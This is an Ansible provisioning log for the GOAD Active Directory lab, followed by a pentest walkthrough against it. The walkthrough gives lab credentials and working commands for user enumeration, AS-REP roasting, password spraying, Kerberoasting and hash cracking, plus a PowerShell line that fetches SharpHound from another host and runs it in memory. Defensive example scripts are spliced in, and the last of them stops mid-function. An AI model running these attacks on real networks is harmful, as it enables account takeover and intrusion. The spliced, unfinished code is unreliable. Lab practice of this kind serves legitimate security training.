 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql_ssms : check SQL Server Manager Studio installer exists on srv02]

TASK [mssql_ssms : check SQL Server Manager Studio installer exists] ***************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql_ssms : get the installer on srv02]

TASK [mssql_ssms : get the installer] **********************************************************************************************************************************************************************
changed: [srv02]
 [started TASK: mssql_ssms : check SSMS installation already done on srv02]

TASK [mssql_ssms : check SSMS installation already done] ***************************************************************************************************************************************************
ok: [srv02]
 [started TASK: mssql_ssms : Install SSMS on srv02]

TASK [mssql_ssms : Install SSMS] ***************************************************************************************************************************************************************************
changed: [srv02]
 [started TASK: mssql_ssms : Reboot after install on srv02]

TASK [mssql_ssms : Reboot after install] *******************************************************************************************************************************************************************
changed: [srv02]
[WARNING]: Could not match supplied host pattern, ignoring: mssql_reporting

PLAY [Install SQL Server reporting] ************************************************************************************************************************************************************************
skipping: no hosts matched

PLAY [Install Webdav] **************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: webdav : Ensure WebDAV client feature is installed on srv02]

TASK [webdav : Ensure WebDAV client feature is installed] **************************************************************************************************************************************************
changed: [srv02]
 [started TASK: webdav : Reboot after installing WebDAV client feature on srv02]

TASK [webdav : Reboot after installing WebDAV client feature] **********************************************************************************************************************************************
changed: [srv02]

PLAY RECAP *************************************************************************************************************************************************************************************************
dc01                       : ok=6    changed=0    unreachable=0    failed=0    skipped=1    rescued=0    ignored=0   
dc02                       : ok=1    changed=0    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   
srv02                      : ok=46   changed=16   unreachable=0    failed=0    skipped=7    rescued=0    ignored=0   

[*] Run playbook : security.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, 
/home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini 
security.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions

PLAY [Read data files] *************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
ok: [dc02]
ok: [srv02]
 [started TASK: save the Json data to a Variable as a Fact on dc01]

TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find domain_adapter on dc01]

TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
 [started TASK: find nat_adapter on dc01]

TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
 [started TASK: find number of interfaces on dc01]

TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find if two adapters on dc01]

TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: confirm nat_adapter on dc01]

PLAY [Setup enable defender] *******************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
ok: [dc02]
 [started TASK: settings/windows_defender : Install windows defender on dc01]
 [started TASK: settings/windows_defender : Install windows defender on dc02]

TASK [settings/windows_defender : Install windows defender] ************************************************************************************************************************************************
ok: [dc01]
ok: [dc02]
 [started TASK: settings/windows_defender : Reboot if needed on dc01]
 [started TASK: settings/windows_defender : Reboot if needed on dc02]
 [started TASK: settings/windows_defender : Disable windows defender sending sample on dc01]
 [started TASK: settings/windows_defender : Disable windows defender sending sample on dc02]

TASK [settings/windows_defender : Disable windows defender sending sample] *********************************************************************************************************************************
changed: [dc02]
changed: [dc01]
 [started TASK: settings/windows_defender : Disable windows defender sending sample on dc01]
 [started TASK: settings/windows_defender : Disable windows defender sending sample on dc02]

TASK [settings/windows_defender : Disable windows defender sending sample] *********************************************************************************************************************************
changed: [dc01]
changed: [dc02]
 [started TASK: settings/windows_defender : Disable network drive scanning on dc01]
 [started TASK: settings/windows_defender : Disable network drive scanning on dc02]
 [started TASK: settings/windows_defender : Disable realtime monitoring on dc01]
 [started TASK: settings/windows_defender : Disable realtime monitoring on dc02]

PLAY [Setup disable defender] ******************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
 [started TASK: settings/windows_defender : Install windows defender on srv02]

TASK [settings/windows_defender : Install windows defender] ************************************************************************************************************************************************
ok: [srv02]
 [started TASK: settings/windows_defender : Reboot if needed on srv02]
 [started TASK: settings/windows_defender : Disable windows defender sending sample on srv02]

TASK [settings/windows_defender : Disable windows defender sending sample] *********************************************************************************************************************************
changed: [srv02]
 [started TASK: settings/windows_defender : Disable windows defender sending sample on srv02]

TASK [settings/windows_defender : Disable windows defender sending sample] *********************************************************************************************************************************
changed: [srv02]
 [started TASK: settings/windows_defender : Disable network drive scanning on srv02]

TASK [settings/windows_defender : Disable network drive scanning] ******************************************************************************************************************************************
changed: [srv02]
 [started TASK: settings/windows_defender : Disable realtime monitoring on srv02]

TASK [settings/windows_defender : Disable realtime monitoring] *********************************************************************************************************************************************
changed: [srv02]

PLAY [Setup security with tasks] ***************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc02]
ok: [dc01]
 [started TASK: include_role : security/{{secu}} on dc01]
 [started TASK: include_role : security/{{secu}} on dc02]
 [started TASK: include_role : security/{{secu}} on srv02]

TASK [include_role : security/{{secu}}] ********************************************************************************************************************************************************************
 [started TASK: security/account_is_sensitive : Account is sensitive on dc01]

TASK [security/account_is_sensitive : Account is sensitive] ************************************************************************************************************************************************
changed: [dc01] => (item={'key': 'renly', 'value': {'account': 'renly.baratheon'}})

PLAY RECAP *************************************************************************************************************************************************************************************************
dc01                       : ok=12   changed=3    unreachable=0    failed=0    skipped=4    rescued=0    ignored=0   
dc02                       : ok=6    changed=2    unreachable=0    failed=0    skipped=4    rescued=0    ignored=0   
srv02                      : ok=8    changed=4    unreachable=0    failed=0    skipped=2    rescued=0    ignored=0   

[*] Run playbook : vulnerabilities.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, 
/home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini 
vulnerabilities.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions

PLAY [Read data files] *************************************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc02]
ok: [dc01]
 [started TASK: save the Json data to a Variable as a Fact on dc01]

TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find domain_adapter on dc01]

TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
 [started TASK: find nat_adapter on dc01]

TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
 [started TASK: find number of interfaces on dc01]

TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: find if two adapters on dc01]

TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
 [started TASK: confirm nat_adapter on dc01]

PLAY [Setup vulnerabilities with tasks] ********************************************************************************************************************************************************************
 [started TASK: Gathering Facts on dc01]
 [started TASK: Gathering Facts on dc02]
 [started TASK: Gathering Facts on srv02]

TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc02]
ok: [dc01]
 [started TASK: include_role : vulns/{{vuln}} on dc01]
 [started TASK: include_role : vulns/{{vuln}} on dc02]
 [started TASK: include_role : vulns/{{vuln}} on srv02]

TASK [include_role : vulns/{{vuln}}] ***********************************************************************************************************************************************************************
 [started TASK: vulns/disable_firewall : Disable Domain firewall on dc01]
 [started TASK: vulns/disable_firewall : Disable Domain firewall on dc02]
 [started TASK: vulns/disable_firewall : Disable Domain firewall on srv02]

TASK [vulns/disable_firewall : Disable Domain firewall] ****************************************************************************************************************************************************
changed: [srv02]
changed: [dc02]
changed: [dc01]
 [started TASK: vulns/directory : Create directory on dc01]
 [started TASK: vulns/directory : Create directory on dc02]
 [started TASK: vulns/directory : Create directory on srv02]

TASK [vulns/directory : Create directory] ******************************************************************************************************************************************************************
changed: [srv02] => (item={'key': 'shares', 'value': 'C:\\shares'})
changed: [dc02] => (item={'key': 'setup', 'value': 'c:\\setup'})
changed: [dc01] => (item={'key': 'setup', 'value': 'c:\\setup'})
changed: [srv02] => (item={'key': 'all', 'value': 'C:\\shares\\all'})
 [started TASK: vulns/files : Copy a single file on dc01]
 [started TASK: vulns/files : Copy a single file on dc02]
 [started TASK: vulns/files : Copy a single file on srv02]

TASK [vulns/files : Copy a single file] ********************************************************************************************************************************************************************
changed: [dc02] => (item={'key': 'rdp', 'value': {'src': 'dc02/bot_rdp.ps1', 'dest': 'c:\\setup\\bot_rdp.ps1'}})
changed: [dc01] => (item={'key': 'template', 'value': {'src': 'dc01/templates/', 'dest': 'C:\\setup\\'}})
changed: [srv02] => (item={'key': 'website', 'value': {'src': 'srv02/wwwroot', 'dest': 'C:\\inetpub\\'}})
changed: [dc02] => (item={'key': 'sysvol_fake_script', 'value': {'src': 'dc02/sysvol_scripts/script.ps1', 'dest': 'C:\\Windows\\SYSVOL\\domain\\scripts\\script.ps1'}})
changed: [srv02] => (item={'key': 'letter_in_shares', 'value': {'src': 'srv02/all/arya.txt', 'dest': 'C:\\shares\\all\\arya.txt'}})
changed: [dc02] => (item={'key': 'sysvol_secret', 'value': {'src': 'dc02/sysvol_scripts/secret.ps1', 'dest': 'C:\\Windows\\SYSVOL\\domain\\scripts\\secret.ps1'}})
 [started TASK: vulns/adcs_templates : Refresh on dc01]

TASK [vulns/adcs_templates : Refresh] **********************************************************************************************************************************************************************
changed: [dc01]
 [started TASK: vulns/adcs_templates : Install ADCSTemplate Module on dc01]

TASK [vulns/adcs_templates : Install ADCSTemplate Module] **************************************************************************************************************************************************
changed: [dc01]
 [started TASK: vulns/adcs_templates : create a directory for templates on dc01]

TASK [vulns/adcs_templates : create a directory for templates] *********************************************************************************************************************************************
ok: [dc01]
 [started TASK: vulns/adcs_templates : Install templates on dc01]

TASK [vulns/adcs_templates : Install templates] ************************************************************************************************************************************************************
changed: [dc01] => (item={'key': 'ESC1', 'value': {'template_name': 'ESC1', 'template_file': 'C:\\setup\\ESC1.json'}})
 [started TASK: vulns/credentials : Store a password in Credential Manager on dc02]

TASK [vulns/credentials : Store a password in Credential Manager] ******************************************************************************************************************************************
changed: [dc02] => (item={'key': 'TERMSRV/castelblack', 'value': {'username': 'north\\robb.stark', 'secret': 'sexywolfy', 'runas': 'north\\robb.stark', 'runas_password': 'sexywolfy'}})
 [started TASK: vulns/autologon : Add windows autologon on dc02]

TASK [vulns/autologon : Add windows autologon] *************************************************************************************************************************************************************
changed: [dc02] => (item={'key': 'robb.stark', 'value': {'username': 'north\\robb.stark', 'password': 'sexywolfy'}})
 [started TASK: vulns/ntlmdowngrade : Enable LmCompatibilityLevel on dc02]

TASK [vulns/ntlmdowngrade : Enable LmCompatibilityLevel] ***************************************************************************************************************************************************
changed: [dc02]
 [started TASK: vulns/enable_llmnr : Enable LLMNR protocol on dc02]

TASK [vulns/enable_llmnr : Enable LLMNR protocol] **********************************************************************************************************************************************************
changed: [dc02]
 [started TASK: vulns/enable_nbt-ns : Enable NBT-NS protocol on dc02]

TASK [vulns/enable_nbt-ns : Enable NBT-NS protocol] ********************************************************************************************************************************************************
changed: [dc02]
 [started TASK: vulns/shares : Create directory if not exist on dc02]
 [started TASK: vulns/shares : Create share on dc02]
 [started TASK: vulns/shares : include_tasks on dc02]
 [started TASK: vulns/shares : include_tasks on dc02]
 [started TASK: vulns/shares : include_tasks on dc02]
 [started TASK: vulns/shares : include_tasks on dc02]
 [started TASK: vulns/openshares : Ensure directory structure for public share exists on srv02]

TASK [vulns/openshares : Ensure directory structure for public share exists] *******************************************************************************************************************************
changed: [srv02]
 [started TASK: vulns/openshares : Ensure public share exists on srv02]

TASK [vulns/openshares : Ensure public share exists] *******************************************************************************************************************************************************
changed: [srv02]
 [started TASK: vulns/openshares : Add or update registry path to allow guest access in SMB on srv02]

TASK [vulns/openshares : Add or update registry path to allow guest access in SMB] *************************************************************************************************************************
changed: [srv02]
 [started TASK: vulns/openshares : activate guest account on srv02]

TASK [vulns/openshares : activate guest account] ***********************************************************************************************************************************************************
changed: [srv02]
 [started TASK: vulns/openshares : Ensure directory structure for all share exists on srv02]

TASK [vulns/openshares : Ensure directory structure for all share exists] **********************************************************************************************************************************
ok: [srv02]
 [started TASK: vulns/openshares : Add all share everyone rights on srv02]

TASK [vulns/openshares : Add all share everyone rights] ****************************************************************************************************************************************************
changed: [srv02]
 [started TASK: vulns/openshares : all shares on srv02]

TASK [vulns/openshares : all shares] ***********************************************************************************************************************************************************************
changed: [srv02]
 [started TASK: vulns/permissions : change folder allow rights on srv02]

TASK [vulns/permissions : change folder allow rights] ******************************************************************************************************************************************************
changed: [srv02] => (item={'key': 'IIS_IUSRS_upload', 'value': {'path': 'C:\\inetpub\\wwwroot\\upload', 'user': 'IIS_IUSRS', 'rights': 'FullControl'}})
 [started TASK: include_role : ps on dc01]
 [started TASK: include_role : ps on dc02]
 [started TASK: include_role : ps on srv02]

TASK [include_role : ps] ***********************************************************************************************************************************************************************************
 [started TASK: ps : Play task {{ps_script}} on dc02]

TASK [ps : Play task ../ad/GOAD-Light/scripts/asrep_roasting.ps1] ******************************************************************************************************************************************
changed: [dc02]
 [started TASK: ps : Play task {{ps_script}} on dc02]

TASK [ps : Play task ../ad/GOAD-Light/scripts/constrained_delegation_use_any.ps1] **************************************************************************************************************************
changed: [dc02]
 [started TASK: ps : Play task {{ps_script}} on dc02]

TASK [ps : Play task ../ad/GOAD-Light/scripts/constrained_delegation_kerb_only.ps1] ************************************************************************************************************************
changed: [dc02]
 [started TASK: ps : Play task {{ps_script}} on dc02]

TASK [ps : Play task ../ad/GOAD-Light/scripts/ntlm_relay.ps1] **********************************************************************************************************************************************
changed: [dc02]
 [started TASK: ps : Play task {{ps_script}} on dc02]

TASK [ps : Play task ../ad/GOAD-Light/scripts/responder.ps1] ***********************************************************************************************************************************************
changed: [dc02]
 [started TASK: ps : Play task {{ps_script}} on dc02]

TASK [ps : Play task ../ad/GOAD-Light/scripts/gpo_abuse.ps1] ***********************************************************************************************************************************************
changed: [dc02]
 [started TASK: ps : Play task {{ps_script}} on dc02]

TASK [ps : Play task ../ad/GOAD-Light/scripts/rdp_scheduler.ps1] *******************************************************************************************************************************************
changed: [dc02]

PLAY RECAP *************************************************************************************************************************************************************************************************
dc01                       : ok=14   changed=6    unreachable=0    failed=0    skipped=2    rescued=0    ignored=0   
dc02                       : ok=17   changed=15   unreachable=0    failed=0    skipped=6    rescued=0    ignored=0   
srv02                      : ok=13   changed=10   unreachable=0    failed=0    skipped=1    rescued=0    ignored=0   

[*] Lab successfully provisioned in 01:49:15
bolke@hacky:~/GOAD$ 
bolke@hacky:~/GOAD$ 

 

.


just a simple writeup

 

🧪 Lab info

🖥️ Hosts

IP            Name   Hostname      Domain
192.168.X.10  dc01   kingslanding  sevenkingdoms.local
192.168.X.11  dc02   winterfell    north.sevenkingdoms.local
192.168.X.12  dc03   meereen       essos.local
192.168.X.22  srv02  castelblack   north.sevenkingdoms.local
192.168.X.23  srv03  braavos       essos.local
192.168.X.31  ws01   casterlyrock  sevenkingdoms.local

📄 Hosts file

To use Kerberos we need to add the lab's DNS names to the /etc/hosts file; this is mandatory because Kerberos relies on FQDN resolution.

You can generate the hosts file with netexec:

netexec smb 192.168.X.0/24 --generate-hosts-file hosts_file
192.168.200.10  kingslanding sevenkingdoms.local kingslanding.sevenkingdoms.local
192.168.200.11  winterfell north.sevenkingdoms.local winterfell.north.sevenkingdoms.local
192.168.200.12  meereen essos.local meereen.essos.local
192.168.200.22  castelblack castelblack.north.sevenkingdoms.local
192.168.200.23  braavos braavos.essos.local
192.168.200.31  casterlyrock casterlyrock.sevenkingdoms.local

🔑 Credentials

User           Password        Host        Domain                     Comments
samwell.tarly  Heartsbane      winterfell  north.sevenkingdoms.local  SMB Enumeration users on winterfell
brandon.stark  iseedeadpeople  winterfell  north.sevenkingdoms.local  ASREP Roasting on north.sevenkingdoms.local
hodor          hodor           winterfell  north.sevenkingdoms.local  Password spraying on winterfell
jon.snow       iknownothing    winterfell  north.sevenkingdoms.local  Kerberoasting on north.sevenkingdoms.local
robb.stark     sexywolfy       winterfell  north.sevenkingdoms.local  Poisoning and cracking hash

🔍 Recon

🔵 SMB recon with netexec

netexec smb 192.168.X.0/24

By default, Microsoft enables SMB signing on Domain Controllers. In secure environments, SMB signing should be enforced network-wide to prevent NTLM relay attacks.

3 Domains found!!

  • sevenkingdoms.local
  • north.sevenkingdoms.local
  • essos.local

🔵 All ports scan with Nmap

sudo nmap -sSV -p- -Pn --open --reason --max-retries 2 --host-timeout 10m --min-rate 500 --scan-delay 50ms  --script "vulners,http-title,http-server-header" --script-args vulners.showall=true,http.useragent="Mozilla/5.0",http.pipeline=1 -T3 -oA all_ports_goad -vvv -iL alive

GOAD Open Ports

Finding users

Anonymous SMB Users enumeration with netexec and anonymous sessions allowed

netexec smb 192.168.56.0/24 --users

Found credentials of Samwell Tarly in description field.
NORTH\samwell.tarly:Heartsbane

We were able to enumerate users and groups because WINTERFELL allows anonymous connections.

🔷 Anonymous SMB Users enumeration without anonymous sessions

Generate a usernames wordlist from GOT website

The GOT website contains the first and last name of every actor.

The following command extracts a FirstName + LastName list from the HTML aria-label attribute, strips special characters, and sorts the result alphabetically without duplicates, taking into account that some actors have no last name.

curl -s \
  -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" \
  https://www.hbo.com/game-of-thrones/cast-and-crew \
  | grep 'href="/game-of-thrones/cast-and-crew/' \
  | grep -o 'aria-label="[^"]*"' \
  | cut -d '"' -f 2 \
  | sed -E 's/[^a-zA-Z. ]//g' \
  | awk '{if(NF == 2) {print $1" "$2} else {print $1}}' \
  | sort -u > got_website_usernames.txt

Archmaester Ebrose
Arya Stark
Balon Greyjoy
...
...
Viserys Targaryen
Yara Greyjoy
Ygritte

The following code is a modification of Namemash script to be able to generate users only with the first name, without last name.

import sys
import os.path

def generate_usernames(name):
    """Generates a list of possible usernames from a given name.

    Args:
        name: The name (full name or single name) to generate usernames from.

    Returns:
        A list of generated usernames.
    """

    lowercase_name = name.lower().strip()
    tokens = lowercase_name.split()

    usernames = []
    if len(tokens) == 1:  # Handle single-name user
        # Use the single name and its variations for usernames
        usernames.append(lowercase_name)
    else:
        # Assume traditional first and last name for multiple tokens
        first_name, last_name = tokens[0], ' '.join(tokens[1:])

        # Generate usernames using different combinations of first and last name
        usernames.append(first_name + last_name)
        usernames.append(last_name + first_name)
        usernames.append(first_name + '.' + last_name)
        usernames.append(last_name + '.' + first_name)
        usernames.append(last_name + first_name[0])
        usernames.append(first_name[0] + last_name)
        usernames.append(last_name[0] + first_name)
        usernames.append(first_name[0] + '.' + last_name)
        usernames.append(last_name[0] + '.' + first_name)
        usernames.append(first_name)
        usernames.append(last_name)

    return usernames

if __name__ == '__main__':
    if len(sys.argv) != 2:
        print(f'usage: {sys.argv[0]} names.txt')
        sys.exit(0)

    if not os.path.exists(sys.argv[1]):
        print(f'{sys.argv[1]} not found')
        sys.exit(0)

    with open(sys.argv[1]) as f:
        for line in f:
            name = line.strip()
            usernames = generate_usernames(name)
            for username in usernames:
                print(username)

python namemash.py got_website_usernames.txt > possible_usernames.txt
alliserthorne
thornealliser
alliser.thorne
thorne.alliser
thornea
...
...
y.greyjoy
g.yara
yara
greyjoy
ygritte

Nmap Username Enumeration without anonymous session

kingslanding

sudo nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='sevenkingdoms.local',userdb=possible_usernames.txt" kingslanding

Found 7 users in sevenkingdoms.local domain.

meereen

sudo nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='essos.local',userdb=possible_usernames.txt" meereen

Found 5 users in essos.local domain.

ASREP Roasting

I create a north_users.txt with all usernames previously found.

arya.stark
brandon.stark
hodor
jeor.mormont
jon.snow
rickon.stark
samwell.tarly
sansa.stark
sql_svc

GetNPUsers.py north.sevenkingdoms.local/ -no-pass -usersfile north_users.txt

hashcat -m 18200 brandon_stark.hash /usr/share/wordlists/rockyou.txt

Found NORTH\brandon.stark:iseedeadpeople credentials.

Password Spraying

This technique can lock out user accounts.

View password policy

crackmapexec smb winterfell --pass-pol

The password policy shows that 5 failed attempts within 5 minutes lock the account for 5 minutes.

View Bad Password Count

This requires valid credentials for any domain user.

crackmapexec smb -u samwell.tarly -p Heartsbane -d north.sevenkingdoms.local winterfell --users

Spraying username=password

crackmapexec smb winterfell -u north_users.txt -p north_users.txt --no-bruteforce

Found NORTH\hodor:hodor credentials.
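
What the spray above looks like from the domain controller's side, as an added example that is not part of the original writeup: one source failing against many accounts inside the lockout window while every account stays below the threshold. The event line format, the source addresses and MIN_DISTINCT_USERS are assumptions; 4625 and 4624 are the Windows failed and successful logon event IDs.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOCKOUT_THRESHOLD = 5           # failures that lock an account (policy shown above)
WINDOW = timedelta(minutes=5)   # observation window from the same policy
MIN_DISTINCT_USERS = 4          # assumption: alert threshold, tune per environment

# Constructed events: "<ISO time> <event id> src=<ip> user=<name>".
SAMPLE_EVENTS = """\
2024-05-01T10:00:01 4625 src=192.168.56.1 user=arya.stark
2024-05-01T10:00:02 4625 src=192.168.56.1 user=brandon.stark
2024-05-01T10:00:03 4624 src=192.168.56.1 user=hodor
2024-05-01T10:00:04 4625 src=192.168.56.1 user=jon.snow
2024-05-01T10:00:05 4625 src=192.168.56.1 user=sansa.stark
2024-05-01T10:02:00 4625 src=192.168.56.31 user=rickon.stark
2024-05-01T10:02:10 4625 src=192.168.56.31 user=rickon.stark
2024-05-01T10:02:20 4625 src=192.168.56.31 user=rickon.stark
""".splitlines()


def detect_spray(lines):
    """Flag sources that fail against many distinct accounts inside WINDOW."""
    recent = defaultdict(deque)   # source -> (time, user) failures inside WINDOW
    alerts = {}
    for line in lines:
        ts, event_id, src, user = line.split()
        if event_id != "4625":    # only failed logons count
            continue
        ts = datetime.fromisoformat(ts)
        src, user = src.split("=", 1)[1], user.split("=", 1)[1].lower()
        q = recent[src]
        q.append((ts, user))
        while ts - q[0][0] > WINDOW:      # drop failures older than the window
            q.popleft()
        per_user = defaultdict(int)
        for _, u in q:
            per_user[u] += 1
        if len(per_user) >= MIN_DISTINCT_USERS:
            users, worst = alerts.get(src, (set(), 0))
            alerts[src] = (users | set(per_user), max(worst, max(per_user.values())))
    # below_lockout=True means account lockout alone never fired for this source
    return {src: {"users": sorted(u), "below_lockout": w < LOCKOUT_THRESHOLD}
            for src, (u, w) in alerts.items()}
```

A spray paced at one attempt per window stays under this detector as well, so the window and threshold need tuning against real logon noise.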

Domain Enumeration

Get Domain Usernames

Getting usernames from north.sevenkingdoms.local domain

GetADUsers.py -all north.sevenkingdoms.local/brandon.stark:iseedeadpeople

Getting usernames from sevenkingdoms.local domain

We can request users from sevenkingdoms.local domain because there is a trust present.

ldapsearch -H ldap://kingslanding -D "brandon.stark@north.sevenkingdoms.local" -w iseedeadpeople -b 'DC=sevenkingdoms,DC=local' "(&(objectCategory=person)(objectClass=user))" | grep 'distinguishedName:'

Getting usernames from essos.local domain

We have no credentials to list this domain, at the moment. 😈

BloodHound

DO NOT USE bloodhound.py

RDP Brandon Stark – Winterfell

xfreerdp /compression /clipboard /dynamic-resolution /toggle-fullscreen /cert-ignore /tls-seclevel:0 /timeout:80000 /bpp:8 /drive:/home/jolmedo/tmp /auto-reconnect /u:brandon.stark /p:iseedeadpeople /d:north /v:winterfell

Enumerate domains

# Execute BloodHound in memory
$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.100.223/SharpHound.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[Sharphound.Program]::Main("--collectionmethods All --domain north.sevenkingdoms.local --searchforest true --outputdirectory c:\users\public\ --zipfilename bh_north_sevenkingdoms.zip".Split())

Also enumerate the sevenkingdoms.local and essos.local domains.

Custom queries

All domains and computers

MATCH p = (d:Domain)-[r:Contains*1..]->(n:Computer) RETURN p

All domains and users

MATCH p = (d:Domain)-[r:Contains*1..]->(n:User) RETURN p

All domains, computers, groups and users

MATCH q=(d:Domain)-[r:Contains*1..]->(n:Group)<-[s:MemberOf]-(u:User) RETURN q

View ACL users

MATCH p=(u:User)-[r1]->(n) WHERE r1.isacl=true and not tolower(u.name) contains 'vagrant' RETURN p

List all users and set them as pwned!

Match (n:User) RETURN n

Kerberoasting

Search for users with an SPN (Service Principal Name) set.

Impacket

GetUserSPNs.py -request -dc-ip winterfell north.sevenkingdoms.local/brandon.stark:iseedeadpeople -outputfile kerberoasting.hashes

Crackmapexec

crackmapexec ldap winterfell -u brandon.stark -p 'iseedeadpeople' -d north.sevenkingdoms.local --kerberoasting kerberoasting.hashes

Cracking kerberoasting.hashes with hashcat

hashcat -m 13100 -a 0 kerberoasting.hashes /usr/share/wordlists/rockyou.txt --force

Found NORTH/jon.snow:iknownothing credentials.
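
Defender's view of the three findings so far (a password left in a description field, an account without Kerberos pre-authentication, a user account carrying an SPN): the audit below is an added example, not part of the original writeup, and runs over a constructed LDIF export of the kind ldapsearch produces. The SPN value and the description wording in the sample are assumptions.

```python
import base64
import re

UF_ACCOUNTDISABLE = 0x0002          # userAccountControl bit flags
UF_DONT_REQUIRE_PREAUTH = 0x400000
SECRET_HINT = re.compile(r"(pass(word|wd)?|pwd)\s*[:=]", re.I)

# Constructed export in the shape ldapsearch prints; values are illustrative.
SAMPLE_LDIF = """\
dn: CN=samwell.tarly,CN=Users,DC=north,DC=sevenkingdoms,DC=local
sAMAccountName: samwell.tarly
description: Samwell Tarly (Password : Heartsbane)
userAccountControl: 66048

dn: CN=brandon.stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local
sAMAccountName: brandon.stark
userAccountControl: 4260352

dn: CN=jon.snow,CN=Users,DC=north,DC=sevenkingdoms,DC=local
sAMAccountName: jon.snow
userAccountControl: 66048
servicePrincipalName: HTTP/example-host.north.sevenkingdoms.local
"""

def parse_ldif(text):
    """Return one {attribute: [values]} dict per entry, attribute names lowercased."""
    text = re.sub(r"\r?\n ", "", text)            # undo RFC 2849 line folding
    entries = []
    for block in re.split(r"\r?\n\s*\r?\n", text.strip()):
        entry = {}
        for line in block.splitlines():
            m = re.match(r"([A-Za-z][\w;.-]*)(::?) ?(.*)$", line)
            if not m:                              # comments and malformed lines
                continue
            attr, sep, value = m.groups()
            if sep == "::":                        # base64-encoded value
                value = base64.b64decode(value).decode("utf-8", "replace")
            entry.setdefault(attr.lower(), []).append(value)
        if entry:
            entries.append(entry)
    return entries

def audit(entries):
    """Return (account, finding) pairs for enabled accounts."""
    findings = []
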